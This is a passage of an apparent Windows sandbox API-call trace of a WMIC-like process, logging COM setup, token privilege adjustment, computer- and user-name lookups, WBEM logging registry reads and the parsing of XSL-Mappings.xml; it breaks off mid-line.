"C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 320 os_tid = 0x11b8 [0309.651] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0309.651] __set_app_type (_Type=0x1) [0309.651] __p__fmode () returned 0x776f3c14 [0309.651] __p__commode () returned 0x776f49ec [0309.651] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0309.651] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0309.652] ??0CHString@@QAE@XZ () returned 0xa685ec [0309.652] malloc (_Size=0x18) returned 0x7d0ee8 [0309.652] malloc (_Size=0x38) returned 0x7d0f08 [0309.652] malloc (_Size=0x28) returned 0x7d0f48 [0309.652] malloc (_Size=0x18) returned 0x7d0f78 [0309.652] malloc (_Size=0x24) returned 0x7d0f98 [0309.652] malloc (_Size=0x18) returned 0x7d0fc8 [0309.652] malloc (_Size=0x18) returned 0x7d0fe8 [0309.652] ??0CHString@@QAE@XZ () returned 0xa688fc [0309.652] malloc (_Size=0x18) returned 0x7d1008 [0309.652] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0309.652] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0309.652] _onexit (_Func=0xa5f370) returned 0xa5f370 [0309.653] _onexit (_Func=0xa5f380) returned 0xa5f380 [0309.653] _onexit (_Func=0xa5f390) returned 0xa5f390 [0309.653] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0309.653] ResolveDelayLoadedAPI () returned 0x74a22590 [0309.654] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0309.658] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0309.668] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x5648f0) returned 0x0 [0309.690] GetCurrentProcess () returned 0xffffffff [0309.690] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x11f7fc | out: TokenHandle=0x11f7fc*=0x194) returned 1 [0309.690] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x11f7f8 | out: TokenInformation=0x0, ReturnLength=0x11f7f8) returned 0 [0309.690] malloc (_Size=0x118) returned 0x7d26b0 [0309.690] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x7d26b0, TokenInformationLength=0x118, ReturnLength=0x11f7f8 | out: TokenInformation=0x7d26b0, ReturnLength=0x11f7f8) returned 1 [0309.690] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x7d26b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0309.690] free (_Block=0x7d26b0) [0309.690] CloseHandle (hObject=0x194) returned 1 [0309.690] malloc (_Size=0x40) returned 0x7d26b0 [0309.691] malloc (_Size=0x40) returned 0x7d26f8 [0309.691] malloc (_Size=0x40) returned 0x7d2740 [0309.691] SetThreadUILanguage (LangId=0x0) returned 0x2d0409 [0309.694] _vsnwprintf (in: _Buffer=0x7d2740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x11f784 | out: _Buffer="ms_409") returned 6 [0309.694] malloc (_Size=0x20) returned 0x7d1200 [0309.694] GetComputerNameW (in: lpBuffer=0x7d1200, nSize=0x11f7e8 | out: lpBuffer="NQDPDE", nSize=0x11f7e8) returned 1 [0309.694] lstrlenW (lpString="NQDPDE") returned 6 [0309.695] malloc (_Size=0xe) returned 0x7d2788 [0309.695] lstrlenW (lpString="NQDPDE") returned 6 [0309.695] ResolveDelayLoadedAPI () returned 0x7444db00 [0309.695] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x11f7fc | out: lpNameBuffer=0x0, nSize=0x11f7fc) returned 0x2d8000 [0309.696] GetLastError () returned 0xea [0309.696] malloc (_Size=0x1e) returned 0x7d27a0 [0309.696] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7d27a0, nSize=0x11f7fc | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x11f7fc) returned 0x1 [0309.697] lstrlenW (lpString="") returned 0 [0309.697] lstrlenW (lpString="NQDPDE") returned 6 [0309.697] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0309.698] lstrlenW (lpString=".") returned 1 [0309.698] lstrlenW (lpString="NQDPDE") returned 6 [0309.698] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0309.698] lstrlenW (lpString="LOCALHOST") returned 9 [0309.698] lstrlenW (lpString="NQDPDE") returned 6 [0309.698] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0309.698] lstrlenW (lpString="NQDPDE") returned 6 [0309.698] lstrlenW (lpString="NQDPDE") returned 6 [0309.698] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0309.698] free (_Block=0x7d2788) [0309.698] lstrlenW (lpString="NQDPDE") returned 6 [0309.698] malloc (_Size=0xe) returned 0x7d2788 [0309.699] lstrlenW (lpString="NQDPDE") returned 6 [0309.699] lstrlenW (lpString="NQDPDE") returned 6 [0309.699] malloc (_Size=0xe) returned 0x7d27c8 [0309.699] lstrlenW (lpString="NQDPDE") returned 6 [0309.699] malloc (_Size=0x4) returned 0x7d27e0 [0309.699] malloc (_Size=0xc) returned 0x7d27f0 [0309.699] ResolveDelayLoadedAPI () returned 0x7745b870 [0309.707] malloc (_Size=0x18) returned 0x7d2808 [0309.708] malloc (_Size=0xc) returned 0x7d2828 [0309.708] SysStringLen (param_1="IDENTIFY") returned 0x8 [0309.708] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0309.708] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0309.708] SysStringLen (param_1="IDENTIFY") returned 0x8 [0309.708] malloc (_Size=0x18) returned 0x7d2840 [0309.708] malloc (_Size=0xc) returned 0x7d2860 [0309.708] SysStringLen (param_1="IMPERSONATE") returned 0xb [0309.708] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0309.708] SysStringLen (param_1="IMPERSONATE") returned 0xb [0309.708] SysStringLen (param_1="IDENTIFY") returned 0x8 [0309.708] SysStringLen (param_1="IDENTIFY") returned 0x8 [0309.708] SysStringLen (param_1="IMPERSONATE") returned 0xb [0309.708] malloc (_Size=0x18) returned 0x7d2878 [0309.708] malloc (_Size=0xc) returned 0x7d2898 [0309.708] SysStringLen (param_1="DELEGATE") returned 0x8 [0309.708] SysStringLen (param_1="IDENTIFY") returned 0x8 [0309.708] SysStringLen (param_1="DELEGATE") returned 0x8 [0309.708] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0309.708] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0309.708] SysStringLen (param_1="DELEGATE") returned 0x8 [0309.708] malloc (_Size=0x18) returned 0x7d28b0 [0309.708] malloc (_Size=0xc) returned 0x7d28d0 [0309.708] malloc (_Size=0x18) returned 0x7d28e8 [0309.708] malloc (_Size=0xc) returned 0x7d2908 [0309.708] SysStringLen (param_1="NONE") returned 0x4 [0309.708] SysStringLen (param_1="DEFAULT") returned 0x7 [0309.708] SysStringLen (param_1="DEFAULT") returned 0x7 [0309.708] SysStringLen (param_1="NONE") returned 0x4 [0309.708] malloc (_Size=0x18) returned 0x7d2920 [0309.708] malloc (_Size=0xc) returned 0x7d2940 [0309.709] SysStringLen (param_1="CONNECT") returned 0x7 [0309.709] SysStringLen (param_1="DEFAULT") returned 0x7 [0309.709] malloc (_Size=0x18) returned 0x7d2958 [0309.709] malloc (_Size=0xc) returned 0x7d04a0 [0309.709] SysStringLen (param_1="CALL") returned 0x4 [0309.709] SysStringLen (param_1="DEFAULT") returned 0x7 [0309.709] SysStringLen (param_1="CALL") returned 0x4 [0309.709] SysStringLen (param_1="CONNECT") returned 0x7 [0309.709] malloc (_Size=0x18) returned 0x7d04b8 [0309.709] malloc (_Size=0xc) returned 0x7d04d8 [0309.710] SysStringLen (param_1="PKT") returned 0x3 [0309.710] SysStringLen (param_1="DEFAULT") returned 0x7 [0309.710] SysStringLen (param_1="PKT") returned 0x3 [0309.710] SysStringLen (param_1="NONE") returned 0x4 [0309.710] SysStringLen (param_1="NONE") returned 0x4 [0309.710] SysStringLen (param_1="PKT") returned 0x3 [0309.710] malloc (_Size=0x18) returned 0x7d29c0 [0309.710] malloc (_Size=0xc) returned 0x7d04f0 [0309.710] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0309.710] SysStringLen (param_1="DEFAULT") returned 0x7 [0309.710] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0309.710] SysStringLen (param_1="NONE") returned 0x4 [0309.710] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0309.710] SysStringLen (param_1="PKT") returned 0x3 [0309.710] SysStringLen (param_1="PKT") returned 0x3 [0309.710] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0309.710] malloc (_Size=0x18) returned 0x7d29e0 [0309.710] malloc (_Size=0xc) returned 0x7d0508 [0309.710] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0309.710] SysStringLen (param_1="DEFAULT") returned 0x7 [0309.710] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0309.710] SysStringLen (param_1="PKT") returned 0x3 [0309.710] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0309.710] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0309.710] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0309.710] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0309.710] malloc (_Size=0x18) returned 0x7d29a0 [0309.710] malloc (_Size=0x40) returned 0x7d0520 [0309.711] malloc (_Size=0x20a) returned 0x7d97c8 [0309.711] GetSystemDirectoryW (in: lpBuffer=0x7d97c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0309.711] free (_Block=0x7d97c8) [0309.711] malloc (_Size=0xc) returned 0x7d0568 [0309.711] malloc (_Size=0xc) returned 0x7d0580 [0309.711] malloc (_Size=0xc) returned 0x7d2d80 [0309.711] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0309.711] SysStringLen (param_1="\\wbem\\") returned 0x6 [0309.711] free (_Block=0x7d0568) [0309.711] free (_Block=0x7d0580) [0309.711] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0309.711] free (_Block=0x7d2d80) [0309.711] malloc (_Size=0xc) returned 0x7d99a0 [0309.711] malloc (_Size=0xc) returned 0x7d98e0 [0309.711] malloc (_Size=0xc) returned 0x7d9940 [0309.711] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0309.711] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0309.712] free (_Block=0x7d99a0) [0309.712] free (_Block=0x7d98e0) [0309.712] GetCurrentThreadId () returned 0x11b8 [0309.712] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x11f30c | out: phkResult=0x11f30c*=0x1a0) returned 0x0 [0309.712] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x11f318, lpcbData=0x11f314*=0x400 | out: lpType=0x0, lpData=0x11f318*=0x30, lpcbData=0x11f314*=0x4) returned 0x0 [0309.712] _wcsicmp (_String1="0", _String2="1") returned -1 [0309.712] _wcsicmp (_String1="0", _String2="2") returned -2 [0309.712] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x11f314*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x11f314*=0x42) returned 0x0 [0309.712] malloc (_Size=0x86) returned 0x7d2d80 [0309.712] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x7d2d80, lpcbData=0x11f314*=0x42 | out: lpType=0x0, lpData=0x7d2d80*=0x25, lpcbData=0x11f314*=0x42) returned 0x0 [0309.712] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0309.712] malloc (_Size=0x42) returned 0x7d2e10 [0309.712] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0309.712] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x11f318, lpcbData=0x11f314*=0x400 | out: lpType=0x0, lpData=0x11f318*=0x36, lpcbData=0x11f314*=0xc) returned 0x0 [0309.712] _wtol (_String="65536") returned 65536 [0309.712] free (_Block=0x7d2d80) [0309.712] RegCloseKey (hKey=0x0) returned 0x6 [0309.712] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x11f7a8 | out: ppv=0x11f7a8*=0x6d45a8) returned 0x0 [0309.728] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x6d45a8, xmlSource=0x11f72c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x11f794 | out: isSuccessful=0x11f794*=0xffff) returned 0x0 [0309.903] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x6d45a8, DOMElement=0x11f7a4 | out: DOMElement=0x11f7a4*=0x6d6b48) returned 0x0 [0309.904] malloc (_Size=0xc) returned 0x7d9880 [0309.904] IXMLDOMElement:getElementsByTagName (in: This=0x6d6b48, tagName="XSLFORMAT", resultList=0x11f7a0 | out: resultList=0x11f7a0*=0x6d9ca0) returned 0x0 [0309.905] free (_Block=0x7d9880) [0309.905] IXMLDOMNodeList:get_length (in: This=0x6d9ca0, listLength=0x11f79c | out: listLength=0x11f79c*=21) returned 0x0 [0309.905] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=0, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.906] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="texttable.xsl") returned 0x0 [0309.906] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.906] malloc (_Size=0xc) returned 0x7d97f0 [0309.907] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.907] free (_Block=0x7d97f0) [0309.907] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0309.907] malloc (_Size=0xc) returned 0x7d9910 [0309.907] malloc (_Size=0xc) returned 0x7d9868 [0309.907] malloc (_Size=0x18) returned 0x7d2bc0 [0309.907] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.907] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.907] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.907] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=1, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.908] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="textvaluelist.xsl") returned 0x0 [0309.908] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.908] malloc (_Size=0xc) returned 0x7d98c8 [0309.908] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.908] free (_Block=0x7d98c8) [0309.908] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0309.908] malloc (_Size=0xc) returned 0x7d9958 [0309.908] malloc (_Size=0xc) returned 0x7d9898 [0309.909] SysStringLen (param_1="VALUE") returned 0x5 [0309.909] SysStringLen (param_1="TABLE") returned 0x5 [0309.909] SysStringLen (param_1="TABLE") returned 0x5 [0309.909] SysStringLen (param_1="VALUE") returned 0x5 [0309.909] malloc (_Size=0x18) returned 0x7d2b40 [0309.909] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.909] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.909] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.909] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=2, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.909] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="textvaluelist.xsl") returned 0x0 [0309.909] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.910] malloc (_Size=0xc) returned 0x7d98b0 [0309.910] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.910] free (_Block=0x7d98b0) [0309.910] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0309.910] malloc (_Size=0xc) returned 0x7d9970 [0309.910] malloc (_Size=0xc) returned 0x7d9988 [0309.910] SysStringLen (param_1="LIST") returned 0x4 [0309.910] SysStringLen (param_1="TABLE") returned 0x5 [0309.910] malloc (_Size=0x18) returned 0x7d2d20 [0309.911] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.911] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.911] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.911] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=3, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.911] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="rawxml.xsl") returned 0x0 [0309.911] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.911] malloc (_Size=0xc) returned 0x7d99b8 [0309.911] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.912] free (_Block=0x7d99b8) [0309.912] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0309.912] malloc (_Size=0xc) returned 0x7d99a0 [0309.912] malloc (_Size=0xc) returned 0x7d99b8 [0309.912] SysStringLen (param_1="RAWXML") returned 0x6 [0309.912] SysStringLen (param_1="TABLE") returned 0x5 [0309.912] SysStringLen (param_1="RAWXML") returned 0x6 [0309.912] SysStringLen (param_1="LIST") returned 0x4 [0309.912] SysStringLen (param_1="LIST") returned 0x4 [0309.912] SysStringLen (param_1="RAWXML") returned 0x6 [0309.912] malloc (_Size=0x18) returned 0x7d2c80 [0309.912] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.913] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.913] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.913] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=4, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.913] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="htable.xsl") returned 0x0 [0309.913] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.913] malloc (_Size=0xc) returned 0x7d98f8 [0309.913] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.914] free (_Block=0x7d98f8) [0309.914] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0309.914] malloc (_Size=0xc) returned 0x7d97f0 [0309.914] malloc (_Size=0xc) returned 0x7d9808 [0309.914] SysStringLen (param_1="HTABLE") returned 0x6 [0309.914] SysStringLen (param_1="TABLE") returned 0x5 [0309.914] SysStringLen (param_1="HTABLE") returned 0x6 [0309.914] SysStringLen (param_1="LIST") returned 0x4 [0309.914] malloc (_Size=0x18) returned 0x7d2aa0 [0309.914] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.914] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.914] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.914] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=5, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.914] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="hform.xsl") returned 0x0 [0309.915] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.915] malloc (_Size=0xc) returned 0x7d9928 [0309.915] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.915] free (_Block=0x7d9928) [0309.915] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0309.915] malloc (_Size=0xc) returned 0x7d98b0 [0309.915] malloc (_Size=0xc) returned 0x7d98e0 [0309.915] SysStringLen (param_1="HFORM") returned 0x5 [0309.915] SysStringLen (param_1="TABLE") returned 0x5 [0309.915] SysStringLen (param_1="HFORM") returned 0x5 [0309.915] SysStringLen (param_1="LIST") returned 0x4 [0309.915] SysStringLen (param_1="HFORM") returned 0x5 [0309.915] SysStringLen (param_1="HTABLE") returned 0x6 [0309.915] malloc (_Size=0x18) returned 0x7d2ae0 [0309.915] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.916] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.916] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.916] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=6, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.916] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="xml.xsl") returned 0x0 [0309.916] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.916] malloc (_Size=0xc) returned 0x7d9928 [0309.916] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.916] free (_Block=0x7d9928) [0309.916] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0309.916] malloc (_Size=0xc) returned 0x7d9928 [0309.916] malloc (_Size=0xc) returned 0x7d9820 [0309.916] SysStringLen (param_1="XML") returned 0x3 [0309.916] SysStringLen (param_1="TABLE") returned 0x5 [0309.916] SysStringLen (param_1="XML") returned 0x3 [0309.917] SysStringLen (param_1="VALUE") returned 0x5 [0309.917] SysStringLen (param_1="VALUE") returned 0x5 [0309.917] SysStringLen (param_1="XML") returned 0x3 [0309.917] malloc (_Size=0x18) returned 0x7d2c60 [0309.917] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.917] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.917] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.917] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=7, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.917] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="mof.xsl") returned 0x0 [0309.917] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.917] malloc (_Size=0xc) returned 0x7d9838 [0309.917] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.917] free (_Block=0x7d9838) [0309.918] 